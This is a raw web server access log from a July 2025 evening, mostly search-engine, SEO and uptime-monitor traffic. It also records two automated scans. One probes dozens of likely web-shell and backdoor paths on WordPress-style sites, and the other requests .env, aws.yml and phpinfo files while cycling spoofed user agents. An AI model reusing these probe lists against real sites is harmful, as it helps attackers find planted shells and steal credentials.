52.185.158.77 - - [17/Jul/2025:19:09:19 +0000] "GET /manager.php?p= HTTP/1.1" 301 247 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:20 +0000] "GET /js/fm.php HTTP/1.1" 301 242 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:20 +0000] "GET /item.php HTTP/1.1" 301 241 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:21 +0000] "GET /plugins/Cache/footer.php HTTP/1.1" 301 257 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:22 +0000] "GET /404.php HTTP/1.1" 301 240 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:22 +0000] "GET /mail.php HTTP/1.1" 301 241 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:22 +0000] "GET /wp-content/plugins/index.php HTTP/1.1" 301 261 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:23 +0000] "GET /sx.php HTTP/1.1" 301 239 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:24 +0000] "GET /wp-admin/maint/admin.php HTTP/1.1" 301 257 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:24 +0000] "GET /article.php HTTP/1.1" 301 244 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:25 +0000] "GET /alfa.php HTTP/1.1" 301 241 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:25 +0000] "GET /1.php HTTP/1.1" 301 238 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:26 +0000] "GET /403.php HTTP/1.1" 301 240 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:26 +0000] "GET /link.php HTTP/1.1" 301 241 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:27 +0000] "GET /byp.php HTTP/1.1" 301 240 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:27 +0000] "GET /bak.php HTTP/1.1" 301 240 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:28 +0000] "GET /ini.php HTTP/1.1" 301 240 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:28 +0000] "GET /ws.php HTTP/1.1" 301 239 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:29 +0000] "GET /wp-trackback.php HTTP/1.1" 301 249 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:29 +0000] "GET /.well-known/index.php HTTP/1.1" 301 254 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:29 +0000] "GET /wp-includes/certificates/plugins.php HTTP/1.1" 301 269 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:31 +0000] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 267 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:31 +0000] "GET /wp-admin/network/plugins.php HTTP/1.1" 301 261 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:32 +0000] "GET /wp-admin/about.php HTTP/1.1" 301 251 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:33 +0000] "GET /chosen.php HTTP/1.1" 301 243 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:33 +0000] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 258 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:34 +0000] "GET /css/index.php HTTP/1.1" 301 246 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:35 +0000] "GET /wp-admin/includes/xmrlpc.php?p= HTTP/1.1" 301 264 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:35 +0000] "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1" 301 267 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:36 +0000] "GET /wp-content/themes/about.php HTTP/1.1" 301 260 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:37 +0000] "GET /filemanager/dialog.php HTTP/1.1" 301 255 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:37 +0000] "GET /wp-admin/maint/index.php HTTP/1.1" 301 257 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:38 +0000] "GET /wp-includes/Requests/Text/admin.php HTTP/1.1" 301 268 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:39 +0000] "GET /wp-includes/customize/about.php HTTP/1.1" 301 264 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:39 +0000] "GET /index/function.php HTTP/1.1" 301 251 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:40 +0000] "GET /uploads/autoload_classmap.php HTTP/1.1" 301 262 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:41 +0000] "GET /wp-includes/css/dist/preferences/wp-login.php HTTP/1.1" 301 278 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:42 +0000] "GET /wp-includes/style-engine/about.php HTTP/1.1" 301 267 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:42 +0000] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 301 270 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:43 +0000] "GET /about/function.php HTTP/1.1" 301 251 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:43 +0000] "GET /wp-includes/theme-compat/chosen.php HTTP/1.1" 301 268 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:44 +0000] "GET /admin/function.php HTTP/1.1" 301 251 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:44 +0000] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 301 269 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:45 +0000] "GET /css/colors/blue/index.php HTTP/1.1" 301 258 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:46 +0000] "GET /wp-content/plugins/pwnd/as.php HTTP/1.1" 301 263 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:46 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 301 258 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:47 +0000] "GET /wp-admin/user/about.php HTTP/1.1" 301 256 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:48 +0000] "GET /wp-admin/js/index.php HTTP/1.1" 301 254 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:48 +0000] "GET /wp-content/upgrade/about.php HTTP/1.1" 301 261 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:49 +0000] "GET /wp-includes/assets/index.php HTTP/1.1" 301 261 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:50 +0000] "GET /wp-content/radio.php HTTP/1.1" 301 253 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:50 +0000] "GET /wp-includes/fonts/index.php?p= HTTP/1.1" 301 263 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:51 +0000] "GET /.well-known/gecko-litespeed.php HTTP/1.1" 301 264 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:52 +0000] "GET /.well-known/admin.php HTTP/1.1" 301 254 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:52 +0000] "GET /wp-content/admin.php HTTP/1.1" 301 253 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:53 +0000] "GET /wp-content/plugins/admin.php HTTP/1.1" 301 261 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:53 +0000] "GET /wp-content/themes/twentytwentytwo/index.php?p= HTTP/1.1" 301 279 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:54 +0000] "GET /.well-known/log.php HTTP/1.1" 301 252 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:55 +0000] "GET /class.php HTTP/1.1" 301 242 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:55 +0000] "GET /bless.php HTTP/1.1" 301 242 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:56 +0000] "GET /wp-includes/js/codemirror/index.php HTTP/1.1" 301 268 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:56 +0000] "GET /wp-includes/block-patterns/index.php HTTP/1.1" 301 269 "-" "-"
52.185.158.77 - - [17/Jul/2025:19:09:57 +0000] "GET /lock360.php HTTP/1.1" 301 244 "-" "-"
66.249.70.138 - - [17/Jul/2025:19:10:38 +0000] "GET /pages/8422-coversure.html HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.144.248.28 - - [17/Jul/2025:19:10:50 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:19:10:59 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:10:59 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:11:38 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
51.68.236.71 - - [17/Jul/2025:19:12:16 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.236.71 - - [17/Jul/2025:19:12:17 +0000] "GET /pages/17053-photos-by-abhi.html HTTP/1.1" 301 268 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
216.73.216.27 - - [17/Jul/2025:19:12:33 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.27 - - [17/Jul/2025:19:12:35 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
69.162.124.235 - - [17/Jul/2025:19:15:55 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:19:16:03 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:16:03 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
69.171.249.9 - - [17/Jul/2025:19:16:44 +0000] "GET /contact_us HTTP/1.1" 301 247 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
85.208.98.23 - - [17/Jul/2025:19:16:45 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:18:35 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
207.32.144.228 - - [17/Jul/2025:19:20:07 +0000] "GET /members/uploads/1/8638_1.jpg HTTP/1.1" 301 265 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
216.144.248.19 - - [17/Jul/2025:19:20:58 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:19:21:08 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:21:09 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
69.171.231.6 - - [17/Jul/2025:19:21:44 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
35.208.139.13 - - [17/Jul/2025:19:22:23 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36"
57.141.0.15 - - [17/Jul/2025:19:22:30 +0000] "GET /pages/43516-powerpoint-electrics-ltd.html HTTP/1.1" 301 274 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.0.2 - - [17/Jul/2025:19:22:34 +0000] "GET / HTTP/1.1" 301 233 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
64.44.111.214 - - [17/Jul/2025:19:23:53 +0000] "GET /members/uploads/4/11274_4.jpg HTTP/1.1" 301 266 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
216.144.248.25 - - [17/Jul/2025:19:26:02 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
182.69.181.236 - - [17/Jul/2025:19:26:21 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5; rv:114.0) Gecko/20100101 Firefox/114.0"
52.12.0.53 - - [17/Jul/2025:19:27:14 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "HawaiiBot"
85.208.98.23 - - [17/Jul/2025:19:28:20 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:28:27 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:29:16 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:29:16 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:29:38 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.27 - - [17/Jul/2025:19:31:06 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:19:32:40 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
110.44.0.83 - - [17/Jul/2025:19:32:41 +0000] "GET /members/uploads/2/16755_2.jpg HTTP/1.1" 301 266 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
66.249.70.137 - - [17/Jul/2025:19:32:49 +0000] "GET /business/west-yorkshire.html?page=10 HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.32.28.66 - - [17/Jul/2025:19:35:13 +0000] "GET /members/uploads/2/16232_2.jpg HTTP/1.1" 301 266 "https://www.google.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
216.144.248.26 - - [17/Jul/2025:19:36:10 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
104.168.71.102 - - [17/Jul/2025:19:36:30 +0000] "GET /members/uploads/3/14564_3.jpg HTTP/1.1" 301 266 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
78.153.140.203 - - [17/Jul/2025:19:38:56 +0000] "\x16\x03\x01" 403 - "-" "-"
78.153.140.203 - - [17/Jul/2025:19:38:56 +0000] "GET /.env HTTP/1.1" 301 234 "-" "More Internet Explorer 5.5 user agents strings -->>"
78.153.140.203 - - [17/Jul/2025:19:38:57 +0000] "GET /api/.env HTTP/1.1" 301 238 "-" "Mozilla/5.0 (iPad; CPU OS 10_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B72 Safari/602.1"
78.153.140.203 - - [17/Jul/2025:19:39:00 +0000] "GET /backend/.env HTTP/1.1" 301 242 "-" "More Firefox 3.5.1 user agents strings -->>"
78.153.140.203 - - [17/Jul/2025:19:39:01 +0000] "GET /admin/.env HTTP/1.1" 301 240 "-" "Mozilla/5.0 (X11; U; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36 OPR/42.0.2393.85"
78.153.140.203 - - [17/Jul/2025:19:39:02 +0000] "GET /.env.example HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 OPR/29.0.1795.47 (Edition RMV)"
78.153.140.203 - - [17/Jul/2025:19:39:02 +0000] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G531F Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36"
78.153.140.203 - - [17/Jul/2025:19:39:02 +0000] "GET /?phpinfo=-1 HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 6.0; LGLS770 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36"
78.153.140.203 - - [17/Jul/2025:19:39:02 +0000] "GET /settings/.env HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920P Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36"
78.153.140.203 - - [17/Jul/2025:19:39:03 +0000] "GET /.env.prod HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36 OPR/38.0.2213.0 (Edition developer)"
78.153.140.203 - - [17/Jul/2025:19:39:03 +0000] "GET /html/.env HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17"
78.153.140.203 - - [17/Jul/2025:19:39:03 +0000] "GET /aws.yml HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
78.153.140.203 - - [17/Jul/2025:19:39:03 +0000] "GET /apis/.env HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/604.5.6 (KHTML, like Gecko) WebClip/13604.5.6 Safari/13604.5.6"
78.153.140.203 - - [17/Jul/2025:19:39:03 +0000] "GET /stage/.env HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
78.153.140.203 - - [17/Jul/2025:19:39:04 +0000] "GET /auth/.env HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-T537A Build/KOT49H) AppleWebKit/537.36 (KHTML like Gecko) Chrome/35.0.1916.141 Safari/537.36"
78.153.140.203 - - [17/Jul/2025:19:39:04 +0000] "GET /env.txt HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4"
78.153.140.203 - - [17/Jul/2025:19:39:05 +0000] "GET /test.php HTTP/1.1" 301 238 "-" "Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6"
78.153.140.203 - - [17/Jul/2025:19:39:05 +0000] "GET /platform/.env HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729)"
194.156.139.137 - - [17/Jul/2025:19:39:06 +0000] "GET /members/uploads/3/1664_3.jpg HTTP/1.1" 301 265 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
66.249.70.139 - - [17/Jul/2025:19:40:13 +0000] "GET /pages/3820-severn-kitchens-fireplaces-woodburners-gloucestershire.html HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.144.248.25 - - [17/Jul/2025:19:41:17 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:19:43:33 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:44:54 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:45:08 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.28 - - [17/Jul/2025:19:46:22 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:19:49:02 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:19:49:12 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
124.239.12.198 - - [17/Jul/2025:19:50:40 +0000] "GET /members/uploads/logo/4923.jpg HTTP/1.1" 301 266 "-" "YisouSpider"
216.144.248.28 - - [17/Jul/2025:19:51:29 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.18 - - [17/Jul/2025:19:56:34 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.137 - - [17/Jul/2025:19:58:57 +0000] "GET /pages/4188-the-signature-spa.html HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.144.248.21 - - [17/Jul/2025:20:01:38 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.138 - - [17/Jul/2025:20:02:04 +0000] "GET /pages/964-certified-training-academy-gym.html HTTP/1.1" 301 282 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:02:10 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:02:10 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:02:36 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:04:07 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:04:10 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.70.139 - - [17/Jul/2025:20:05:11 +0000] "GET /pages/5601-cambridge-circuit-company-ltd.html HTTP/1.1" 301 282 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.245.221.83 - - [17/Jul/2025:20:06:44 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
198.240.120.187 - - [17/Jul/2025:20:07:05 +0000] "GET /members/uploads/1/36719_1.jpg HTTP/1.1" 301 266 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
216.144.248.26 - - [17/Jul/2025:20:11:49 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
43.159.145.153 - - [17/Jul/2025:20:12:10 +0000] "GET / HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.165.189.110 - - [17/Jul/2025:20:13:34 +0000] "GET /pages/22248-local-seo-group-sheffield.html HTTP/1.1" 301 279 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.208.98.23 - - [17/Jul/2025:20:14:47 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:14:47 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:16:43 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:16:43 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.18 - - [17/Jul/2025:20:16:54 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.137 - - [17/Jul/2025:20:17:40 +0000] "GET /pages/2944-dragon-kwoon-martial-arts.html HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:19:43 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:19:44 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
